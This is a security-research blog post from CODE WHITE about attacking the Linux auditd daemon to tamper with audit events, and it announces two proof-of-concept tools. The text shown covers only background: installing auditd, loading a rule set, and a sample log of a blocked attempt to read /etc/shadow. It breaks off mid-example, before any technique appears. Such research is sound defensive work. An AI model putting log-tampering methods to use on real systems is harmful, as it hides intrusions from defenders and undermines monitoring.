<!DOCTYPE html><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>CODE WHITE - Finest Hacking</title>
    <meta name="description" content="The Linux audit framework provides a powerful audit system for monitoring security relevant events on Linux operating systems. In this blogpost, we demonstrate some attacks on its userspace component auditd with the goal to tamper with audit events to hide malicious activity. We also released two PoCs called daphne and apollon that demonstrate different techniques to tamper with audit events.
Background Over the last couple of years, monitoring and endpoint protection solutions have developed rapidly. ">
    <link rel="canonical" href="https://code-white.com/blog/2023-08-blindsiding-auditd-for-fun-and-profit/" />


    






<meta property="og:title" content="

CODE WHITE | Blindsiding auditd for Fun and Profit

">

<meta property="og:description" content="



">

<meta property="og:type" content="

article

">

<meta property="og:url" content="https://code-white.com/blog/2023-08-blindsiding-auditd-for-fun-and-profit/"><meta property="og:image" content="https://code-white.com/images/featured.png"/>
    <link rel="stylesheet" href="https://code-white.com/css/header.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/style.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/side-nav_local.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/blog-list.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/blog-single.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/default_list.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/default_paginator.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/public-vulnerability-list.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/imprint.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/privacy-policy.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/careers.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/404.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/taxonomies/tag.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/share-buttons.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/share-buttons_side-fixed.css" type="text/css" media="all" />
    <link rel="stylesheet" href="https://code-white.com/css/rss-list.css" type="text/css" media="all" />

    <link rel="alternate"
          type="application/rss+xml"
          href="https://code-white.com/index.xml"
          title="CODE WHITE - Finest Hacking - Cumulated InfoSec feed">

    <link rel="alternate"
          type="application/rss+xml"
          href="https://code-white.com/blog/index.xml"
          title="CODE WHITE - Finest Hacking - InfoSec Blog">














    <script>
        document.addEventListener("keyup", (e) => {
            if (e.key === "Escape")
            document.getElementById("navigation-menu-wrapper").classList.add("hidden")
        })
    </script>
</head>

    <script src="https://code-white.com/js/blog_single.js"></script>

<html lang="en-us">
    <body>
    <div class="site-clamp">
        <div class="site-wrapper">
            <div class="nav-bar-wrapper"><header>
    <div class="navbar" role="navigation">
        <div class="navbar__left">
            <div class="header_menu-icon-wrapper" onclick="openMenu()">
                <img src="https://code-white.com/images/menu-burger_white.svg " alt="menu-burger" class="header_menu-icon">
            </div>
        </div>
        
        <div class="link-title">Blog</div>
        
        

        <div class="navbar__right">
            <img src="https://code-white.com/images/Logo_reinzeichnung_weiss.svg" alt="" style="height: 100%; max-height: 40px; padding: 5px 0 5px 0; box-sizing: border-box" onclick="window.location.href='https://code-white.com/';">
        </div>
    </div>

    <nav id="navigation-menu-wrapper" class="navigation-menu-wrapper hidden">
        <div class="menu-backdrop"  onclick="closeMenu()">

            <div class="close-menu-button-wrapper" onclick="closeMenu()">
                <img class="icon_regular" src="https://code-white.com/icons/menu-close_white.svg" alt="close-menu-icon">
            </div>
            <div class="header_menu-link-wrapper">
                <nav class="menu-link-collection">
                    
                        <a href="https://code-white.com/" class="menu-link " onclick="closeMenu()">CODE WHITE - FINEST HACKING</a>
                    
                        <a href="https://code-white.com/#intelligence-driven-security" class="menu-link menu-link_sub" onclick="closeMenu()">Intelligence Driven Security</a>
                    
                        <a href="https://code-white.com/#initial" class="menu-link menu-link_sub" onclick="closeMenu()">Initial Assessment</a>
                    
                        <a href="https://code-white.com/#security-intelligence-service" class="menu-link menu-link_sub" onclick="closeMenu()">Security Intelligence Service</a>
                    
                        <a href="https://code-white.com/#about-us" class="menu-link menu-link_sub" onclick="closeMenu()">About us</a>
                    
                </nav>

                <nav class="menu-link-collection">
                    
                        <a href="https://code-white.com/public-vulnerability-list" class="menu-link" onclick="closeMenu()">PUBLIC VULNERABILITY LIST</a>
                    


                    
                    <a href="https://code-white.com/public-vulnerability-list/#sppageparserfilter-bypass-in-sharepoint" class="menu-link menu-link_sub" onclick="closeMenu()">SPPageparserFilter Bypass in SharePoint</a>
                    
                    <a href="https://code-white.com/public-vulnerability-list/#data-source-protection-bypass-during-xml-deserialization-in-devexpress" class="menu-link menu-link_sub" onclick="closeMenu()">Data Source Protection Bypass During XML Deserialization in DevExpress</a>
                    
                    <a href="https://code-white.com/public-vulnerability-list/#exposed-dangerous-method-or-function-in-experience-manager-experience-platform-and-experience-commerce" class="menu-link menu-link_sub" onclick="closeMenu()">Exposed Dangerous Method or Function in Experience Manager, Experience Platform, and Experience Commerce</a>
                    

                    <a href="https://code-white.com/public-vulnerability-list/" class="menu-link menu-link_sub" onclick="closeMenu()">...</a>


                </nav>

                <nav class="menu-link-collection">
                    
                    <a href="https://code-white.com/careers" class="menu-link" onclick="closeMenu()">CAREERS</a>
                    

                    
                        <a href="https://code-white.com/careers/#pentester-redteamer" class="menu-link menu-link_sub" onclick="closeMenu()">Pentester / Redteamer</a>
                    
                        <a href="https://code-white.com/careers/#developer" class="menu-link menu-link_sub" onclick="closeMenu()">Developer</a>
                    
                        <a href="https://code-white.com/careers/#systems-engineer" class="menu-link menu-link_sub" onclick="closeMenu()">Systems Engineer / Admin</a>
                    
                        <a href="https://code-white.com/careers/#challenge" class="menu-link menu-link_sub" onclick="closeMenu()">Challenge</a>
                    
                </nav>

                <nav class="menu-link-collection">
                    
                        <a href="https://code-white.com/blog" class="menu-link" onclick="closeMenu()">BLOG</a>
                    
                    
                        <a href="https://code-white.com/blog/2023-08-blindsiding-auditd-for-fun-and-profit/" class="menu-link menu-link_sub" onclick="closeMenu()">Blindsiding auditd for Fun and Profit</a>
                    
                        <a href="https://code-white.com/blog/2023-07-from-blackbox-dotnet-remoting-to-rce/" class="menu-link menu-link_sub" onclick="closeMenu()">From Blackbox .NET Remoting to Unauthenticated Remote Code Execution</a>
                    
                        <a href="https://code-white.com/blog/2023-04-java-exploitation-restrictions-in-modern-jdk-times/" class="menu-link menu-link_sub" onclick="closeMenu()">Java Exploitation Restrictions in Modern JDK Times</a>
                    
                    
                        <a href="https://code-white.com/blog" class="menu-link menu-link_sub" onclick="closeMenu()">...</a>
                    

                </nav>
            </div>
            <div class="menu-footer">
                <div class="social-icons-wrapper">
                    <a href="https://infosec.exchange/@codewhitesec" target="_blank">
                        <img class="icon_social" src="https://code-white.com/images/social/mastodon.svg" alt="mastodon-icon">
                    </a>
                    <a href="https://www.linkedin.com/company/code-white-gmbh" target="_blank">
                        <img class="icon_social" src="https://code-white.com/images/social/linkedin.svg" alt="linkedin-icon">
                    </a>
                    <a href="https://www.xing.com/companies/codewhitegmbh" target="_blank">
                        <img class="icon_social" src="https://code-white.com/images/social/xing.svg" alt="xing-icon">
                    </a>
                    <a href="https://twitter.com/codewhitesec" target="_blank">
                        <img class="icon_social" src="https://code-white.com/images/social/twitter.svg" alt="twitter-icon">
                    </a>
                    <a href="https://code-white.com/rss" target="">
                        <img class="icon_social" src="https://code-white.com/images/social/rss-feed-icon.svg" alt="rss-feed-icon">
                    </a>
                </div>
                <div class="menu-footer_mandatory-links">
                    <a href="https://code-white.com/imprint" class="menu-footer_mandatory-links_link">Imprint</a>
                    <a href="https://code-white.com/privacy-policy" class="menu-footer_mandatory-links_link">Privacy Policy</a>
                </div>
                <div class="copyright-claim">2014 - 2023 &copy; CODE WHITE GmbH</div>
            </div>
            <img class="menu-backdrop-decoration" src="https://code-white.com/images/Code-White_horizon_white_transp.svg"
                 alt="close-menu-icon">
        </div>
    </nav>
</header>

<script>
    function closeMenu(){
        document.getElementById("navigation-menu-wrapper").classList.add("hidden")
    }

    function openMenu(){
        document.getElementById("navigation-menu-wrapper").classList.remove("hidden")
    }
</script>
</div>
            <main>
    <div class="fixed-soc-med-dock">
        







<nav class="sharebuttons-sf">
    
    
    <div><a href="https://www.linkedin.com/shareArticle?mini=true&url=https%3a%2f%2fcode-white.com%2fblog%2f2023-08-blindsiding-auditd-for-fun-and-profit%2f&title=Blindsiding%20auditd%20for%20Fun%20and%20Profit&summary=The%2bLinux%2baudit%2bframework%2bprovides%2ba%2bpowerful%2baudit%2bsystem%2bfor%2bmonitoring%2bsecurity%2brelevant%2bevents%2bon%2bLinux%2boperating%2bsystems.%2bIn%2bthis%2bblogpost%252C%2bwe%2bdemonstrate%2bsome%2battacks%2bon%2bits%2buserspace%2bcomponent%2b%25E2%2580%25A6" target="_blank"><svg
        style="isolation:isolate"
        viewBox="0 0 500 500"
        width="500pt"
        height="500pt"
        version="1.1"
        id="svg1063"
        xmlns="http://www.w3.org/2000/svg"
        xmlns:svg="http://www.w3.org/2000/svg">
    <defs
            id="defs1051">
        <clipPath
                id="_clipPath_7OiLPaz2aPIdc4yXtQcD6BPVCGlQBcbA">
            <rect
                    width="500"
                    height="500"
                    id="rect1048" />
        </clipPath>
    </defs>
    <g
            clip-path="url(#_clipPath_7OiLPaz2aPIdc4yXtQcD6BPVCGlQBcbA)"
            id="g1061">
        <g
                id="g1059">
            <g
                    id="g1057">
                <g
                        id="g1055">
                    <path
                            class="will-change_sf"
                            d=" M 106.419 61.33 C 81.504 61.33 61 81.834 61 106.749 C 61 131.665 81.504 152.164 106.419 152.164 L 106.429 152.164 C 131.34 152.162 151.834 131.66 151.834 106.749 L 151.834 106.74 C 151.829 81.829 131.333 61.33 106.419 61.33 L 106.419 61.33 Z  M 339.394 180.335 C 311.249 181.227 285.263 196.54 270.922 221.061 L 269.865 221.061 L 269.865 186.619 L 194.734 186.619 L 194.734 438.661 L 272.998 438.661 L 272.998 313.976 C 272.998 281.096 279.232 249.255 319.995 249.255 C 360.178 249.255 360.703 286.876 360.703 316.103 L 360.703 438.67 L 438.968 438.67 L 439 300.405 C 439 232.527 424.374 180.349 345.051 180.349 C 343.159 180.278 341.271 180.275 339.394 180.334 L 339.394 180.335 Z  M 67.216 186.619 L 67.216 438.67 L 145.558 438.67 L 145.558 186.619 L 67.216 186.619 Z "
                            fill-rule="evenodd"
                            fill="rgb(255,255,255)"
                            id="path1053" />
                </g>
            </g>
        </g>
    </g>
</svg>
</a></div>
    
    <div><a href="https://www.xing.com/social_plugins/share/new?sc_p=xing-share&h=1&url=https%3a%2f%2fcode-white.com%2fblog%2f2023-08-blindsiding-auditd-for-fun-and-profit%2f" target="_blank"><svg
        style="isolation:isolate"
        viewBox="0 0 500 500"
        width="500pt"
        height="500pt"
        version="1.1"
        id="svg901"
        xmlns="http://www.w3.org/2000/svg"
>
    <defs
            id="defs885">
        <clipPath
                id="_clipPath_0lsag36D1AxeJJykDnvjLacHlXXHtm42">
            <rect
                    width="500"
                    height="500"
                    id="rect882" />
        </clipPath>
    </defs>
    <g
            clip-path="url(#_clipPath_0lsag36D1AxeJJykDnvjLacHlXXHtm42)"
            id="g899"
            >
        <g
                id="g897">
            <g
                    id="g895">
                <g
                        id="g893">
                    <g
                            id="g891">
                        <path
                                class="will-change_sf"
                                d=" M 101.966 121.323 C 98.272 121.323 95.163 122.62 93.601 125.157 C 91.983 127.779 92.235 131.152 93.947 134.568 L 135.427 206.373 C 135.504 206.508 135.504 206.587 135.427 206.719 L 70.245 321.747 C 68.544 325.134 68.627 328.537 70.245 331.158 C 71.807 333.68 74.567 335.34 78.262 335.34 L 139.61 335.34 C 148.784 335.34 153.204 329.15 156.341 323.489 C 156.341 323.489 220.087 210.749 222.569 206.371 C 222.328 205.967 180.392 132.823 180.392 132.823 C 177.339 127.386 172.724 121.32 163.312 121.32 L 101.966 121.323 Z "
                                fill="rgb(255,255,255)"
                                id="path887" />
                        <path
                                class="will-change_sf"
                                d=" M 359.694 37.318 C 350.533 37.318 346.56 43.09 343.269 49.002 C 343.269 49.002 211.106 283.378 206.756 291.075 C 206.97 291.494 293.926 450.998 293.926 450.998 C 296.965 456.435 301.664 462.682 311.061 462.682 L 372.34 462.682 C 376.034 462.682 378.92 461.288 380.482 458.764 C 382.114 456.142 382.072 452.685 380.347 449.282 L 293.861 291.27 C 293.784 291.135 293.784 290.993 293.861 290.866 L 429.691 50.703 C 431.392 47.315 431.434 43.858 429.825 41.236 C 428.263 38.714 425.364 37.318 421.669 37.318 L 359.694 37.318 Z "
                                fill="rgb(255,255,255)"
                                id="path889" />
                    </g>
                </g>
            </g>
        </g>
    </g>
</svg>
</a></div>
    <div><a href="https://twitter.com/share?text=Blindsiding%20auditd%20for%20Fun%20and%20Profit&url=https%3a%2f%2fcode-white.com%2fblog%2f2023-08-blindsiding-auditd-for-fun-and-profit%2f" target="_blank"><svg
        style="isolation:isolate"
        viewBox="0 0 500 500"
        width="500pt"
        height="500pt"
        version="1.1"
        id="svg1259"
        xmlns="http://www.w3.org/2000/svg">
    <defs
            id="defs1227">
        <clipPath
                id="_clipPath_vaJk5wYvZGuZWHbAM53tLDZFdqVd5cG6">
            <rect
                    width="500"
                    height="500"
                    id="rect1224" />
        </clipPath>
    </defs>
    <g
            clip-path="url(#_clipPath_vaJk5wYvZGuZWHbAM53tLDZFdqVd5cG6)"
            id="g1257">
        <g
                id="g1235">
            <g
                    id="g1233">
                <g
                        id="g1231">
                    <path
                            class="will-change_sf"
                            d=" M 573.149 189.812 C 569.874 189.812 567.178 192.507 567.178 195.782 C 567.178 199.058 569.874 201.752 573.149 201.752 L 573.15 201.752 C 576.425 201.752 579.119 199.057 579.119 195.782 L 579.119 195.781 C 579.118 192.506 576.424 189.812 573.149 189.812 L 573.149 189.812 Z  M 603.774 205.455 C 600.074 205.573 596.658 207.586 594.773 210.809 L 594.634 210.809 L 594.634 206.282 L 584.758 206.282 L 584.758 239.413 L 595.046 239.413 L 595.046 223.023 C 595.046 218.701 595.866 214.515 601.224 214.515 C 606.506 214.515 606.575 219.461 606.575 223.303 L 606.575 239.414 L 616.863 239.414 L 616.868 221.239 C 616.868 212.316 614.945 205.457 604.518 205.457 C 604.269 205.448 604.021 205.448 603.774 205.455 L 603.774 205.455 Z  M 567.995 206.282 L 567.995 239.414 L 578.294 239.414 L 578.294 206.282 L 567.995 206.282 Z "
                            fill-rule="evenodd"
                            fill="rgb(255,255,255)"
                            id="path1229" />
                </g>
            </g>
        </g>
        <g
                id="g1243">
            <g
                    id="g1241">
                <g
                        id="g1239">
                    <path
                            class="will-change_sf"
                            d=" M 486.257 103.456 C 468.873 111.167 450.187 116.377 430.58 118.72 C 450.594 106.723 465.967 87.726 473.204 65.088 C 454.471 76.199 433.725 84.265 411.642 88.612 C 393.961 69.77 368.766 58 340.883 58 C 287.347 58 243.94 101.403 243.94 154.939 C 243.94 162.537 244.798 169.936 246.451 177.031 C 165.883 172.989 94.453 134.394 46.64 75.743 C 38.295 90.06 33.513 106.711 33.513 124.478 C 33.513 158.111 50.628 187.783 76.639 205.167 C 60.749 204.664 45.801 200.302 32.731 193.042 C 32.719 193.446 32.719 193.852 32.719 194.261 C 32.719 241.229 66.136 280.407 110.483 289.319 C 102.349 291.535 93.785 292.719 84.944 292.719 C 78.697 292.719 72.626 292.109 66.705 290.98 C 79.042 329.492 114.842 357.519 157.264 358.299 C 124.087 384.301 82.288 399.8 36.868 399.8 C 29.043 399.8 21.327 399.339 13.743 398.444 C 56.645 425.951 107.601 442 162.346 442 C 340.656 442 438.167 294.285 438.167 166.177 C 438.167 161.974 438.072 157.795 437.886 153.634 C 456.824 139.969 473.258 122.897 486.254 103.456 L 486.257 103.456 Z "
                            fill-rule="evenodd"
                            fill="rgb(255,255,255)"
                            id="path1237" />
                </g>
            </g>
        </g>
        <g
                id="g1255">
            <g
                    id="g1253">
                <g
                        id="g1251">
                    <g
                            id="g1249">
                        <path
                                d=" M 656.778 202 C 656.255 202 655.815 202.184 655.594 202.543 C 655.365 202.914 655.401 203.391 655.643 203.874 L 661.512 214.035 C 661.523 214.054 661.523 214.065 661.512 214.084 L 652.289 230.36 C 652.049 230.839 652.06 231.321 652.289 231.691 C 652.51 232.048 652.901 232.283 653.424 232.283 L 662.104 232.283 C 663.402 232.283 664.028 231.407 664.472 230.606 C 664.472 230.606 673.492 214.654 673.843 214.034 C 673.809 213.977 667.875 203.627 667.875 203.627 C 667.443 202.858 666.79 202 665.458 202 L 656.778 202 Z "
                                fill="rgb(255,255,255)"
                                id="path1245" />
                        <path
                                d=" M 693.246 190.114 C 691.95 190.114 691.387 190.93 690.922 191.767 C 690.922 191.767 672.221 224.931 671.605 226.02 C 671.636 226.079 683.94 248.649 683.94 248.649 C 684.37 249.418 685.035 250.302 686.364 250.302 L 695.035 250.302 C 695.558 250.302 695.966 250.105 696.187 249.747 C 696.418 249.377 696.412 248.887 696.168 248.406 L 683.931 226.047 C 683.92 226.028 683.92 226.008 683.931 225.99 L 703.15 192.008 C 703.391 191.528 703.397 191.039 703.169 190.668 C 702.948 190.311 702.538 190.114 702.015 190.114 L 693.246 190.114 Z "
                                fill="rgb(255,255,255)"
                                id="path1247" />
                    </g>
                </g>
            </g>
        </g>
    </g>
</svg>
</a></div>
    
</nav>

    </div>
    <div class="single_blog-post-header">
        <div  class="single_blog-post-header-button" onclick="navigateBack(history)">
            <img src="https://code-white.com/images/arrow_head_plain_white.svg" alt="">
        </div>
    </div>

    <div class="single_blog-post-footer">
        <div class="single_blog-post-footer-button arrow_up arrow_up-width-manager-class">
            <img src="https://code-white.com/images/arrow_head_plain_white.svg" alt="">
        </div>
    </div>

    <div class="single_blog-post-wrapper">
        <div class="modal image-viewer-wrapper">
            
            <img class="modal-content" id="zoom-viewer-image-shell">
        </div>


        <article class="single_blog-post-content">
            <div class="article-header">
                <div> Aug 3, 2023</div>
                 
                    
                    <div class="single_blog-post_author-wrapper">
                             <a class="blog-header_author" href="https://code-white.com/authors/tobias-neitzel">Tobias Neitzel</a>
                                <span class="blog-header_author_separator"  style="display: none;" style="display: inline;" >|</span></div>
                
            </div>
            <div class="single-blog-post-content-wrapper">
                <h1>Blindsiding auditd for Fun and Profit</h1>
                <p>The <em>Linux audit framework</em> provides a powerful audit system for monitoring
security relevant events on <em>Linux</em> operating systems. In this blogpost, we
demonstrate some attacks on its userspace component <em>auditd</em> with the goal
to tamper with audit events to hide malicious activity. We also released two <em>PoCs</em>
called <a href="https://github.com/codewhitesec/daphne">daphne</a> and <a href="https://github.com/codewhitesec/apollon">apollon</a>
that demonstrate different techniques to tamper with audit events.</p>
<h3 id="background">Background</h3>
<p>Over the last couple of years, monitoring and endpoint protection solutions have developed
rapidly. Especially for <em>Windows</em> operating systems there is a wide range of available
products that are commonly used in larger organizations. Whereas endpoint protection and extensive
monitoring have become the default on <em>Windows</em> workstations and servers, their <em>Linux</em> counterparts
are usually less protected, even though <em>Linux</em> provides great telemetry for free by using the <em>Linux
audit framework</em>.</p>
<p>On most <em>Linux</em> distributions, the <em>Linux audit framework</em> can be installed via a package manager.
On <em>Fedora</em> for example, the following commands can be used:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[user@host ~]$ sudo dnf install audit
</span></span><span style="display:flex;"><span>[user@host ~]$ sudo systemctl enable auditd
</span></span><span style="display:flex;"><span>[user@host ~]$ sudo systemctl start auditd
</span></span></code></pre></div><p>The default installation of the <em>audit framework</em>
provides only a minimal rule set. To get a reasonable starting point, the <em>auditd</em> rule set of
<a href="https://github.com/Neo23x0/auditd">Florian Roth</a> can be used:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[user@host ~]$ wget <span style="color:#e6db74">&#39;https://raw.githubusercontent.com/Neo23x0/auditd/master/audit.rules&#39;</span>
</span></span><span style="display:flex;"><span>[user@host ~]$ sudo mv audit.rules /etc/audit/rules.d/audit.rules
</span></span><span style="display:flex;"><span>[user@host ~]$ sudo systemctl kill auditd
</span></span><span style="display:flex;"><span>[user@host ~]$ sudo systemctl start auditd
</span></span></code></pre></div><p>After restarting the <em>auditd</em> daemon, fine grained logging of events can be found within the
<em>auditd</em> log file at <code>/var/log/auditd/audit.log</code>. The following example shows the attempt of a regular
user to read the contents of the <code>/etc/shadow</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span>type<span style="color:#f92672">=</span>SYSCALL msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690783519.928</span><span style="color:#f92672">:</span><span style="color:#ae81ff">929</span><span style="color:#f92672">):</span> arch<span style="color:#f92672">=</span>c000003e syscall<span style="color:#f92672">=</span><span style="color:#ae81ff">257</span> success<span style="color:#f92672">=</span>no exit<span style="color:#f92672">=-</span><span style="color:#ae81ff">13</span> a0<span style="color:#f92672">=</span>ffffff9c a1<span style="color:#f92672">=</span><span style="color:#ae81ff">7f</span>ffd0dd98f0 a2<span style="color:#f92672">=</span><span style="color:#ae81ff">80000</span> a3<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> items<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> ppid<span style="color:#f92672">=</span><span style="color:#ae81ff">1160</span> pid<span style="color:#f92672">=</span><span style="color:#ae81ff">1184</span> auid<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> uid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> gid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> euid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> suid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> fsuid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> egid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> sgid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> fsgid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> tty<span style="color:#f92672">=</span>pts2 ses<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> comm<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;bat&#34;</span> exe<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/usr/bin/bat&#34;</span> key<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;etcpasswd&#34;</span>ARCH<span style="color:#f92672">=</span>x86_64 SYSCALL<span style="color:#f92672">=</span>openat AUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;unset&#34;</span> UID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> GID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> EUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> SUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> FSUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> EGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> SGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> FSGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PATH msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690783519.928</span><span style="color:#f92672">:</span><span style="color:#ae81ff">929</span><span style="color:#f92672">):</span> item<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/etc/shadow&#34;</span> inode<span style="color:#f92672">=</span><span style="color:#ae81ff">270575</span> dev<span style="color:#f92672">=</span>ca<span style="color:#f92672">:</span><span style="color:#ae81ff">03</span> mode<span style="color:#f92672">=</span><span style="color:#ae81ff">0100000</span> ouid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> ogid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> rdev<span style="color:#f92672">=</span><span style="color:#ae81ff">00</span><span style="color:#f92672">:</span><span style="color:#ae81ff">00</span> nametype<span style="color:#f92672">=</span>NORMAL cap_fp<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fi<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fe<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fver<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_frootid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>OUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> OGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PROCTITLE msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690783519.928</span><span style="color:#f92672">:</span><span style="color:#ae81ff">929</span><span style="color:#f92672">):</span> proctitle<span style="color:#f92672">=</span><span style="color:#ae81ff">626174002</span>D70002F6574632F736861646F77
</span></span></code></pre></div><p>In the log format of <em>auditd</em> all log entries are separated by newlines,
but multiple lines can still belong to the same event. In the example above, all three lines belong to the
same event with event ID <code>929</code>. Moreover, <em>auditd</em> uses hex encoding for some types of messages.</p>
<p>To group connected <em>auditd</em> events and to convert them into a <em>SIEM</em> friendly format, the
<a href="https://github.com/threathunters-io/laurel">laurel</a> plugin can be used. <em>laurel</em> is a post processing
tool for <em>auditd</em> events that generates <em>JSON</em> output from <em>auditd</em> events. Connected events are grouped
together, encoded values are decoded and some other enrichment is applied. Using <em>laurel</em>, the
event shown above looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;ID&#34;</span>: <span style="color:#e6db74">&#34;1690783519.928:929&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;SYSCALL&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;arch&#34;</span>: <span style="color:#e6db74">&#34;0xc000003e&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;syscall&#34;</span>: <span style="color:#ae81ff">257</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;success&#34;</span>: <span style="color:#e6db74">&#34;no&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;exit&#34;</span>: <span style="color:#ae81ff">-13</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;items&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ppid&#34;</span>: <span style="color:#ae81ff">1160</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;pid&#34;</span>: <span style="color:#ae81ff">1184</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;auid&#34;</span>: <span style="color:#ae81ff">4294967295</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;uid&#34;</span>: <span style="color:#ae81ff">1000</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;gid&#34;</span>: <span style="color:#ae81ff">1000</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;euid&#34;</span>: <span style="color:#ae81ff">1000</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;suid&#34;</span>: <span style="color:#ae81ff">1000</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;fsuid&#34;</span>: <span style="color:#ae81ff">1000</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;egid&#34;</span>: <span style="color:#ae81ff">1000</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;sgid&#34;</span>: <span style="color:#ae81ff">1000</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;fsgid&#34;</span>: <span style="color:#ae81ff">1000</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;tty&#34;</span>: <span style="color:#e6db74">&#34;pts2&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ses&#34;</span>: <span style="color:#ae81ff">4294967295</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;comm&#34;</span>: <span style="color:#e6db74">&#34;bat&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;exe&#34;</span>: <span style="color:#e6db74">&#34;/usr/bin/bat&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;etcpasswd&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ARCH&#34;</span>: <span style="color:#e6db74">&#34;x86_64&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;SYSCALL&#34;</span>: <span style="color:#e6db74">&#34;openat&#34;</span>,
